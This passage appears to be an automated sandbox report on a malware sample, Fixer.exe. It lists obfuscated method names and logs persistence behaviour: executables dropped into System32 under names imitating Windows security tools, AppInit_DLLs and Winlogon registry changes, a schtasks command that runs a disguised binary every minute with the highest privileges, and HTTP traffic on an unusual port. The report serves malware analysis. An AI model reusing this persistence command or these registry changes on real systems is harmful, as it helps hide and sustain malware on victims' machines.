                      Source: Defender.exe.3.dr, ogkoRtQNRnFHYCnvNGTSgt.csHigh entropy of concatenated method names: 'oOnwkySUEoBZ', 'FbzfjIHajOZmiphQxTIvYwZdx', 'PySATXdopmGojYmgFAO', 'CIkEHUteZJBVi', 'tIIivBJtzvJ', 'kjJrrZPneGNO', 'yezOgklGffdYWEMAIJpuxjJ', 'iRcFuZmutpwXKfSL', 'DEEgSUUCmWwYUvPUe', 'OHfLGsiehHoqcrdVufF'
                      Source: Defender.exe.3.dr, iICVrXHYKfHIpFQXbL.csHigh entropy of concatenated method names: 'rFzCejHzsNZCU', 'HSyQLGECpvftBnpvEGjQsUj', 'XmjXOKldmRh', 'RGQFHoQEXliTKwITSDynir', 'YWgneJBGjGBdypdJDEfjlDQ', 'RBRKiTuFaOriaA', 'uVfyMITKdptuiDIHUGTWd', 'rXQMwDkyujCSkNGFDFyqnVo', 'LBRGWcGeIBdHhALPa', 'uKrQSvBPCNXmEWisBvm'
                      Source: Defender.exe.3.dr, lczhEUcowbNWQ.csHigh entropy of concatenated method names: 'nrEZEgZidL', 'ImHNwZvxzK', 'vnnRPpKUMKNBwpKLnJm', 'zngwhUbABSZ', 'rJwRmmQjYJyqulL', 'lOHnMHfHHqkvOJSuk', 'JmssYAtCepopBwICOnKlEkep', 'vBUVOqEGybZft', 'HuJcpSRonnLuejzrYICicz', 'hQykjCUjWVxDruIoW'
                      Source: Defender.exe.3.dr, prnQkWxyXENbjeKZECPLhTnn.csHigh entropy of concatenated method names: 'RauDLZwfTJkJZrHXrU', 'ZSRKucRvGrMVEzoSwCuMeRv', 'UaPeKInqzwNJAP', 'btdqnHofJl', 'KVwHLIWBqTMnlxDVV', 'meRgBTSBbIIf', 'GtlxSurkFnzZhPGssjlSXXHH', 'TcpKhOsKXFtAAlbeXgr', 'GUELIiYWMYjldTz', 'CaYZGPJJMrryKoz'
                      Source: Defender.exe.3.dr, MWYDrsjTSJqoS.csHigh entropy of concatenated method names: 'qsTFEGzLlzHCnRKh', 'kVZucnSXyOYrEpBhFA', 'TrOFMAkZvpESJk', 'GTtYNEBhFsaThJGUiRwN', 'VQMtsNXiuwPGVjiogmJS', 'INmgCPpUWBMXA', 'DheVqezLvLMMaYgBemvYM', 'aMpyiNYvCj', 'yeGBRSoKxRaUppQo', 'WabbYAGRfsvlnzId'
                      Source: Defender.exe.3.dr, ISaCjfIATBL.csHigh entropy of concatenated method names: 'gQsGvyIMyhFUMUyq', 'HdBWAJnBgCIBRMzoDmeHq', 'sdcEaNFqOgRPMYKzgHF', 'OwAKgUGgIiT', 'valXtviawqnbjCAadEFX', 'mRvdSXFGZh', 'NjTlnnGkYfHXIYaeUfC', 'cwgJIpuaYcT', 'JHOAjOnqxVyWeumEr', 'lbXcDRCKcxtfMwMkOAKauGs'
                      Source: Defender.exe.3.dr, JMLcPxDFGCfojQLRgfkS.csHigh entropy of concatenated method names: 'TgKyLZaRtKtJzsQ', 'gtWFAthDVcgaJGHLH', 'qfBeDYcoNslfkY', 'sAmOMSZyGciszHmCiBjBkXBp', 'dMgpRqsIfRFVxvxRguBVfdgap', 'eAWKUyxQjGt', 'plqkTqghkFlk', 'dAUSzfFAOMr', 'VxHYgLrXXFQevJqtISYPm', 'qydykanIaYy'
                      Source: Defender.exe.3.dr, TJTvwBaIBQS.csHigh entropy of concatenated method names: 'fwlmloNajoHIlHgMA', 'HXgWEcAWhAJvnIgLMZ', 'mxTiaUeBKKoUNIaIvrIrJm', 'GMQoBycZvHXNeo', 'FCaapLtfwmNzkTEhgAiMWK', 'dDiktMpuvUGlFRixDNg', 'BozrFqarNvbSvWwX', 'azTGsRfeizPx', 'eyppeoDqeC', 'yhAsopjULqcNNOJXTNXrK'
                      Source: Defender.exe.3.dr, UhBFJdricqufqaojV.csHigh entropy of concatenated method names: 'ZluADFKYEZvUcgzYxWc', 'LcxxXJKzdEkHCbwweT', 'vvkYRmHNOfRcRHuSwnw', 'tuLvAonSBjDtdtggbE', 'KQwwTLbTAIJAIiqjBko', 'dzpMecXzYbNqsHlMx', 'rjYVnKsjuLmJewmfCLajSqncv', 'uSHBwemDsEzHLfUuh', 'MOwREMFalOfBw', 'aOQZctOIXaEhguzvPXIaPgcc'
                      Source: Defender.exe.3.dr, WVihDmlAmRFUAdyEhT.csHigh entropy of concatenated method names: 'lcXdxSUGGnfVPqVnN', 'dNfzaclAov', 'DKYDOEzzsl', 'jfeNHvpeeqlEDF', 'mCurxeYGDcGRBlWnUOOdzUN', 'qLKRJRGUxVSxFBok', 'ZbkBdnsICRppc', 'SoYAmUHwmWlTgTYiTaeSatd', 'MXRIHAQfVczIgABQ', 'dpNPKHYjTxO'
                      Source: Defender.exe.3.dr, KxxSSIzaCTUHBCvRNLqyDXZ.csHigh entropy of concatenated method names: 'TgaEpLqydIyuWCaHNS', 'mhcftdlvvpWnmYUymhulqdVe', 'DBvKkjllbnvrAhbEPuJHUMW', 'DoZThFJLym', 'cqlKFkCKkYHlzTgbiMWYrf', 'GwJSDWdksNryOejDXSBlcvDZ', 'AeaycOxxwe', 'wRyoHoPXIUSwyJ', 'GqtQKsjSDrClPzuBRzVHFUMdo', 'fRfhhcpdIHDfTVMzuwE'
                      Source: Defender.exe.3.dr, LORYroboCXxqjpTmhsXqFkvZK.csHigh entropy of concatenated method names: 'ArLDvgByOLypWkkSBihjSpzIh', 'sVsaSsNtokczcRpk', 'HnrWmGmiNsaeLrDWco', 'GntGbcwzpCGPthOrUpx', 'OFrFznPcsZc', 'cJemOhQupG', 'gGchxxzjgeiQBwoGoNUHQZGnk', 'bdmZCQIHLyX', 'RftpwVtscqZ', 'bgVzgHzpwtVVwHbSIt'
                      Source: Defender.exe.3.dr, VoFTVipipkK.csHigh entropy of concatenated method names: 'VMantYKYfAnacPRV', 'DQtAcwiaBZQaoUKaKqmcuoiCw', 'VBfrFRUkmUQUsPsMs', 'uxqfdzRZesDOhrECbhuJTzFEi', 'JqyWkhvjIzjpXfagmbhXmZ', 'pnKSjfvrmxnpaaI', 'VSyjETmJOjmM', 'XKDkZJjZPMDNHwrkpzF', 'SLEoqLVAADzsiNPmkFB', 'YjGGuVxXvZYkgiL'
                      Source: Defender.exe.3.dr, tisnIiXyTCXvDDO.csHigh entropy of concatenated method names: 'iJnrHhQxpVf', 'afkSbpIpfAFPRx', 'noTZewWYBUkKLSu', 'nCHXoSFTOuYXiEXaKQdIWwBTE', 'ixrewXlCRNJa', 'VizKjXzqwwJAvplcqA', 'ThjHbjxAmgmKQjnHaWlSvE', 'lAieBizZaMVHvlb', 'blXMJJmtQIhLFFisO', 'xGtFwRnGMyucrWz'
                      Source: Defender.exe.3.dr, gBeJmXXsXHezdPh.csHigh entropy of concatenated method names: 'eUDcfhQyzzyEOUmAxDQN', 'lmsKaeQoSgVylMzBA', 'ylfJmZSeDVdBZyULthLSE', 'zJhSdFcHmyx', 'RbrbzTrwbvLRHWe', 'TSqihvmVcUvMBwjeEI', 'sUSisaIcEyQLGbCoUIOk', 'pVzfXfueLgNzqmFBk', 'HYSiXLJplyIPVpYJDzSCVvNxs', 'DMQpwnjLGLEHynW'
                      Source: Defender.exe.3.dr, EwsvuuRydySCmvfwUdTl.csHigh entropy of concatenated method names: 'LvCpvdStvFLfKcjkzIm', 'OTwhHeTfhdsyCEsB', 'FyRyFitGWcSvLUVgQQryVi', 'JmLRMNcFjivuJUW', 'lDakBAkVJWRm', 'BDUXhIMuQgtuWjNQaMLtHF', 'uxPICpIqvpSiebWbMKOUWhpf', 'XFiKFsgvIZZSAJE', 'qxEEAioEkzjt', 'ZNIkqfjZfpxlmWCwJMAJM'
                      Source: Defender.exe.3.dr, QEEFRJhvySTxMB.csHigh entropy of concatenated method names: 'aDNCrkYOApwXNfzcDoeqHTo', 'oCobulrMvsWPQUkcspDQVmTP', 'qPIhKkHPTNpwwUPxjcUJjMjEB', 'SPXYCiYcDViflIPAwGugvUoSl', 'zGPegEfLRrrvL', 'YTQtPErLujPc', 'VCxaFmsjSNZp', 'zZqXIBvmIbEvDhSnLgO', 'uKIUQmISYFG', 'DlFRVWaOgWNasfBFZvGhKmi'
                      Source: Defender.exe.3.dr, jZWTVmmWOyYUMMRcqrgzxt.csHigh entropy of concatenated method names: 'ebNNwrzjWnUktguoiZGMylOI', 'MzLyzOspersHZpfP', 'CgscXvwDxaqhwt', 'EtksnlWZbuPoC', 'JjbxjihQroDOuBnCHhy', 'CfFmbefHRhIGuXnrOkM', 'foCvoYqUlZmiq', 'dedoVFDazJgwUXNwn', 'UoAOcJxCnKWrvaQXt', 'NZOHHEpsPsET'
                      Source: Defender.exe.3.dr, jDcxkJFhdsO.csHigh entropy of concatenated method names: 'ZVTlUGzgCUxzHTc', 'pLyoVESOrBkIzZvCXj', 'MjNkMsfBPGdpQhesSuawUD', 'tSVqgcZubYd', 'rcalvpCDHNMTbV', 'dIxnVJfTSqCzYpMCRmRm', 'rIfGRAwfFCOKvw', 'dlIGMIHvsqeNvLvgKjRlA', 'gDJinMnnodsaYge', 'ZHjMmPnmBUKWD'
                      Source: Defender.exe.3.dr, VgiXrAmmXM.csHigh entropy of concatenated method names: 'RlSpcTxUImVHRJThXP', 'UFtJFrybKqoQQdWbgICKPSM', 'PAZQNYTOWgsWXcMy', 'rneUWEdvinYVFcBsZtF', 'iOmWZtklADDvEfX', 'izsvvVekutRDrdyiHfw', 'BHvdTruejdQZEVJaBJW', 'jBcfbguXFVoYj', 'ebEPcDbAAQcrzVTXhxJjtzeP', 'mxWYOospJq'
                      Source: Defender.exe.3.dr, EiphzSFywDsQvfJ.csHigh entropy of concatenated method names: 'UguORtUtzui', 'dkKlBYhllU', 'PQlvpndBHrv', 'ulpsNbUzFBfoNQWBjyB', 'AZfxgyeGWsbIhFQA', 'fUKRUAOlwiYQb', 'IqbeUFrMPwNdNZW', 'HAWpDeqCfYQL', 'QGpuZSSGbwuUTFODrnoPp', 'YumPezZyvofczqYioH'
                      Source: Defender.exe.3.dr, nkKpBsREeeBrrJgLniKFn.csHigh entropy of concatenated method names: 'uPkrNGBgDoNjgrSgOmrox', 'tJdcdXdhIRyApvFJfLCy', 'NeIdpsHUXOypNVbNkc', 'CWfvlfBXaEHglzFgfUz', 'eWMkDzLcZdwuiYvEhiXynU', 'QQiNpHpwtlozgKuslTZ', 'xINxNDBywxBAJqvUUmWUkgDJu', 'PumplfOWiICkzlGrA', 'jnpqOZXzwFOQFDDpoHLGLWmn', 'nSkmkNsgHZHi'
                      Source: Defender.exe.3.dr, DDkXafHupjcDyMCFpVaefrMq.csHigh entropy of concatenated method names: 'qCGRdOsVhMwopUbX', 'jnSGDElovbagPMrtBj', 'BdLVjhRzGQzBzHCIZY', 'nyUdhmSpSAEunk', 'WzXRjZmEfXvZaZNDSVmwdgzei', 'ryzBWMRAkCkHopA', 'pFlNsPEwmZBoUpAtjShnEdBj', 'aoKTKgxvjqts', 'YbuDOwKdfuCrXWHN', 'LECFRbtdbtDslzGBOtFtAP'
                      Source: Defender.exe.3.dr, OLCRwsTtwxxSGZuMngxi.csHigh entropy of concatenated method names: 'STWcrGlCPAYMVdXTCakSo', 'EXEssEuclOoxwsgoE', 'hrgwYFkwWskGMPwuOyYzO', 'HnPKYYhfmOVykwrHyyHw', 'BreCYBCdhQEYAjshOhMP', 'FWkNfzCGAZsRAFwkIzWfBFx', 'akNzakQugqwUtot', 'zXhqLGzdww', 'hqkpAZTnumC', 'PJylKJbrTFUfeXGFTkj'
                      Source: Defender.exe.3.dr, JqoyJMwYkYeSSSLBCERtJfL.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'eiLcBLWnxSzTbooKAH', 'jdfmOziWNDFxt', 'shTrcPinsNklrCmXVRYOlwywx', 'TpJjrUFVjGVTYscvlSC', 'IfkphnZeMviWtzvseI', 'PfVTfCCtglpKgtVV', 'FTBDubJoYyZZwjRdwmwmME', 'fustWkCcYdHnKGSUEMfHE', 'UkBYhkHYicAhWJCimD'
                      Source: Defender.exe.3.dr, WpAqmEEzEwNIXIzRzOYiu.csHigh entropy of concatenated method names: 'xCQxqDhktAiNXUabbXDUuhnau', 'tGJXUzpZsyZoNASUCMZJk', 'rXnAeZCPPqDFKaaVgjX', 'ccBmJDCafaAkANPljUVQWcijl', 'pstggqmlDOVB', 'aXcjopSFwKplLNHcztSABNK', 'zuKyOKBQidutustuTCsh', 'uUcfJDVDApN', 'ukueUqmJZDiTO', 'GzXhyUcdEZiTEGfMhohg'
                      Source: Defender.exe.3.dr, avfHckAjbIOftjcvbDvZXrf.csHigh entropy of concatenated method names: 'YzCIvbnXWQBODZHdYFCd', 'NKwQlKHrQVjPyjchr', 'zUrIdiNsBvRASoBJKpGrKQ', 'fFvSzEqevhRCJgEhNCs', 'LZQDuOpYnbzd', 'oLDhQOoLRVSAlscGHspR', 'UGprXkORrUhn', 'UVAzxnEwuDxCIVNR', 'jKMaTENqsdZuZBlNSYH', 'IuBMMaCspOP'
                      Source: Defender.exe.3.dr, XOWrfubIFwwWSRBCkfv.csHigh entropy of concatenated method names: 'GzXbQMXAGN', 'mwxeQIuYrPpc', 'GQHFLAVEzNYYrvaTWaCrnJZ', 'mltpHDkRXfUAESpG', 'DniZGZMUFVonkExqmSZGgxv', 'HBMaaOElvzkVqvgMhVB', 'wdmaXKSzPzMGrFRFNlur', 'DrkUbzqmNZKwMhd', 'lDQvEVvmdeleaz', 'aKSslBFwKbMBaBKeYorbievL'
                      Source: Defender.exe.3.dr, UACsUQnggztSoYk.csHigh entropy of concatenated method names: 'VdSINmzcYlFUDFbLWy', 'fqUxahHlBoZLppD', 'uGVDiBZTjLSdbYhvpFF', 'AgsaFAyozZPezcgFBvkeR', 'OOOdKcHeWj', 'QcOOuxhClUJvodzrcutVa', 'zRdMbqVhVDgujzRq', 'yCbfgETazKke', 'cNJvcwliVrhEyGPuuzaln', 'TzpSNJlcfkClbSkoWUFYdLub'
                      Source: Defender.exe.3.dr, JfAFbFqmPAXuSFACrag.csHigh entropy of concatenated method names: 'RkDnIXrgyetV', 'sVHoXFlXRvG', 'epDDikiPXN', 'cMxDNKolHBpajsOTV', 'kzpwkehncPuKFgfxebaBXNcK', 'ApPTLUQNUnNjgcSWaiYqwwIum', 'msUXXWfxkpRTRu', 'xktSOyzIexfETCEgVhx', 'YsxQqEirdEGQdNzLPcYO', 'kpZrSLvgIwlTMEEnccKQHe'
                      Source: Defender.exe.3.dr, fxrViPtroaCbyONKrcHijo.csHigh entropy of concatenated method names: 'cGXWrGRrNpktfJDBwyi', 'MCfobByeOtYEqSPP', 'tBkWiomOVhBoa', 'kBSSZbjvpHncU', 'gCNtoqDwxzdOsZF', 'xqoioCXzpobxMdjF', 'ViSUHzkHnEToLiJp', 'JxolcdfNDAPGjTPY', 'XrnzqqEbAxDKeGRHrTmQisEn', 'DzUADkEQRKS'
                      Source: Defender.exe.3.dr, GprCBzVajSFPhcvMz.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'WYpgNUnjwEYMhBcgWYlMeqbwj', 'NMmrnMiPoxTKxWYciysWlr', 'QuyKVUgxswZG', 'wFQLeSMeNMbPoBIdEM', 'WEVxpCMvIA', 'NYQxfchgsTfdDiXvhS', 'UokWjXaHbJRXEemyC', 'rWfvXTjrbSPRGfcjfldCgaFVG', 'bwbyQjVwqwtZQQnsv'
                      Source: Defender.exe.3.dr, AgGuxbclsJDKUXCF.csHigh entropy of concatenated method names: 'PgBtGwUrqzqNZCUoKeqOHE', 'uciUipnmdWskfbbukmD', 'bmYTGiVKsMrg', 'AGRXclBCMNqgS', 'NikFbDwDHDPNAUcuQfMZeU', 'XHABEPZhmotIb', 'GPcOxzNHOlha', 'wLTsKsYMybBrniW', 'ZGMAlKPjKgVwPtOUex', 'VTvjPDvIobXKQreofUZ'
                      Source: Defender.exe.3.dr, NCWTJiYmOo.csHigh entropy of concatenated method names: 'fdXRNOXStt', 'qgnMDAxeooZwPsjKWKTw', 'HeaGYfIPuIRJgLpfweYojzNG', 'HZdEBIZwljCMFeUpPufH', 'jgteZfvHMIRUZRGeLtArN', 'cnSrADyUFhyuYskZbceoZalr', 'NOLEAfPZoEGMifrIrDjW', 'tOumSXNYVBCaKnpnQEC', 'UkodNsxnfhXBVBUzRSiH', 'ASCDlYsCVb'
                      Source: Defender.exe.3.dr, qmajBmcCnsP.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'akoWoQJegFQzWGz', 'sLLtHQapfaLkpD', 'GhBLeixaxKaECT', 'FDgyYJtcIK', 'yqNEYpdrKSVuU', 'ukOigLYWdVIEqeEMEsBU', 'HMsllbLJjkILQeYfubylc', 'swUyynxOdtAxn', 'VxvjMMtlztaAfhKQC'
                      Source: Defender.exe.3.dr, JjNonPeEqnKrhUWFcwVNuQ.csHigh entropy of concatenated method names: 'HumVdnzFHHCRoAp', 'svjgfSSfzqHTWdUvtQGtB', 'ARrhDkeCiEmKcSLjnocHVmgf', 'dmHYXtvlxuSoyPhAxICh', 'ACkJcSRtYNlMy', 'yXeKLqZfXsupYuHYed', 'WcjXOvberZhhczpjdSyrrmVer', 'ntXmAjHObxOzPP', 'MiFqKSpjKeFflGkGFfAIh', 'EYyZNYrUdCjH'
                      Source: Defender.exe.3.dr, XbJdqTwlJhtvvHI.csHigh entropy of concatenated method names: 'cQQnOSFXJkniwgH', 'CtFVrLKWlIexEaFmY', 'XIDtCEWlTGfNocZTtBCm', 'QGuBFnHTjfAKNJzVJr', 'yFrEqYTCXk', 'DklHGCJsxQPSkbeDbSax', 'JAoVYBDdlljjCbQYGCxMQ', 'kjnHdLUsjxmwujwliAFPLefi', 'AOfUQdlTPQFhRYrItCmw', 'ggbUUwGBiGD'
                      Source: Defender.exe.3.dr, TpneWzinmRLNNvomkAusssN.csHigh entropy of concatenated method names: 'IuRdXCfNaLeGuJEFSv', 'zBBLzbjMHFiAa', 'LVbhFPjlxnBRhsbwpa', 'gOaHiRBnqYIrKDfincXNfcODN', 'itrkLPIDuNlOt', 'DctNpwrNCJoTRM', 'EzXtYjIvFMsiHJS', 'ZjHKDiBNRSUriwsyvlpNOUUgv', 'oBwNkEkMPjJCOVyJcFO', 'NITunVTEjEPbPXu'
                      Source: Defender.exe.3.dr, MtweeSvrtsEjaEHkGcqcH.csHigh entropy of concatenated method names: 'DFiwVYdhZUOx', 'YRQgkFOHierWZwABKbbd', 'prwiwWNMSkU', 'WiSpwGWsAVaqZwccgP', 'nUcjaUxnjBuPuXuCNhLNUEk', 'TQFIAukgDrh', 'uzsVyTnrFFfT', 'tOuUBXikZPJPpmpQNMD', 'mIOpqPBQtyOkldHfpMBTyX', 'jjGJgybrtcetlAFe'
                      Source: Defender.exe.3.dr, vFtGvLdAuIQGYPbHNoGtunigD.csHigh entropy of concatenated method names: 'BohTfzMQNzNDrnTSGfvSzctK', 'kQyFHWNDAJoSadRuICctK', 'SabgDkkwZvXjuiNKFdAzqdeAg', 'eYraQRZnxY', 'aScSDktvqiigxwzsKGo', 'bABGMFyeFKHlpgfKXhntlEpT', 'rteRYOhIcCZRWGymOqgbxrQR', 'VdTvKWLhKVLUNhvZcMeFtB', 'oHXOIsyzcMdCkONSfO', 'LkmRAIkBVfmMuUCeomICo'
                      Source: Defender.exe.3.dr, OtMRnVOsGKHl.csHigh entropy of concatenated method names: 'OaJVtSKEyPaxQqAqb', 'AYiHvMpChJPGtAijBpNMbGp', 'PelUWeNCfT', 'MqHfxgrkBosV', 'OhpLdOPujgrRaUfDv', 'batVtuKPgkWnNX', 'LFppCYRDMdKP', 'XMLhFbQvgtnuBN', 'fYvSTJOOqNtoKWgrjexs', 'YohmHMfMBuBLjYoi'
                      Source: Defender.exe.3.dr, ueHNMdjwjYBvgC.csHigh entropy of concatenated method names: 'KVvAMKuWDzYAKXvnmxTAjYSYH', 'HXDGRMJZqUXHDFzIEOodZY', 'lOxMCNlCXtXCXSwiLrkgaP', 'uOBbUEkdOjjSrTzGLFR', 'OfCbpHgcmo', 'NWjDyBlQynPJToAEOMkYbJO', 'OMZmMXIrasVwIQB', 'aoSMyWjnpCR', 'CPPDHSombzDbfX', 'bSDwyLeymqBSsclwKGsp'
                      Source: Defender.exe.3.dr, WYdQIVjMOZZzFKSg.csHigh entropy of concatenated method names: 'xVmIWWPGmNsQwHeZFZzsKD', 'NuZjXgamrjtndQMzBOKVIqvS', 'vZAlToetaYNwnsa', 'aAhCTAJsZydAh', 'WzHRbHaBYuPtDryDNVjJi', 'NPyuPHLUKdMnCOpWQTkZbmn', 'xSuWkIRYEflrShrTp', 'jlhPokNqFQZ', 'ObbZxxNpjCMn', 'WcxEjbQkXCCrhdJIuCAz'
                      Source: Defender.exe.3.dr, sDxpENeYXPsYVcYDBrZBiKvaq.csHigh entropy of concatenated method names: 'lMRPIUZJwfRESTctpRH', 'OqlcEVUlOiIWzabSHIGXy', 'gslwZGZpUeTDP', 'apKnAnvOXvErrJmgKjnCKsrI', 'NMYNeCvKgrRyTXLQRVpshPPD', 'TjQNkhxCqmbWAssIhLSUir', 'clsXBPPywVaKT', 'xvJUwdkjuRcxjADxjFc', 'obsKwmboeAaiZdjPI', 'mObsrauEgP'
                      Source: Defender.exe.3.dr, fIEdZvXcpYAipTNh.csHigh entropy of concatenated method names: 'EgSyrpMyfurJMCyrIsjumlKCY', 'AfbyDBzvzsXWnTre', 'BgSdVCqgadnKTVPaVohXhqp', 'RCFUmFQCIrJVF', 'edkScYMkfXHwReKGLKrILSw', 'tVNkCcLuVcJDnPOR', 'hXiMpnlsBfzewhMgNYHLbiDLN', 'pUGTwwZKevOKEibsAw', 'PYvxWZqGGWyTW', 'OxRliiDElDQSDUZjjhHzxCuWk'
                      Source: Defender.exe.3.dr, huigHuEqBhxV.csHigh entropy of concatenated method names: 'xSzRXLdUGGB', 'ZKUsvmanhRBy', 'vZyEKNVIgqk', 'NjhhmbnhYi', 'jyFuXiXfRAOclfQwtfzt', 'jqhDsFvqNReNpOGE', 'yaILTBzHwBVeuCZ', 'PzHYqfccpDjjPvRJsagYlI', 'phwwEZLTPFYaOy', 'cTxgVQRQrAkMmUVADGj'

                      Persistence and Installation Behavior

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeExecutable created and started: C:\Windows\System32\Defender.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeExecutable created and started: C:\Windows\System32\xdwdSecurityHealthSystrays.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeFile created: C:\Windows\System32\Defender.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Fixer.exeFile created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile created: C:\Windows\System32\xdwdSecurityHealthSystrays.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Fixer.exeFile created: C:\Users\user\AppData\Local\Temp\FixerNerest.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeFile created: C:\Windows\System32\Defender.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile created: C:\Windows\System32\xdwdSecurityHealthSystrays.exeJump to dropped file

                      Boot Survival

                      barindex
                      Allows loading of unsigned dll using appinit_dll
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeRegistry value created: RequireSignedAppInit_DLLs 0Jump to behavior
                      Creates an undocumented autostart registry key
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows LoadAppInit_DLLsJump to behavior
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 1911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 1911 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 1911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 1911 -> 49749
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
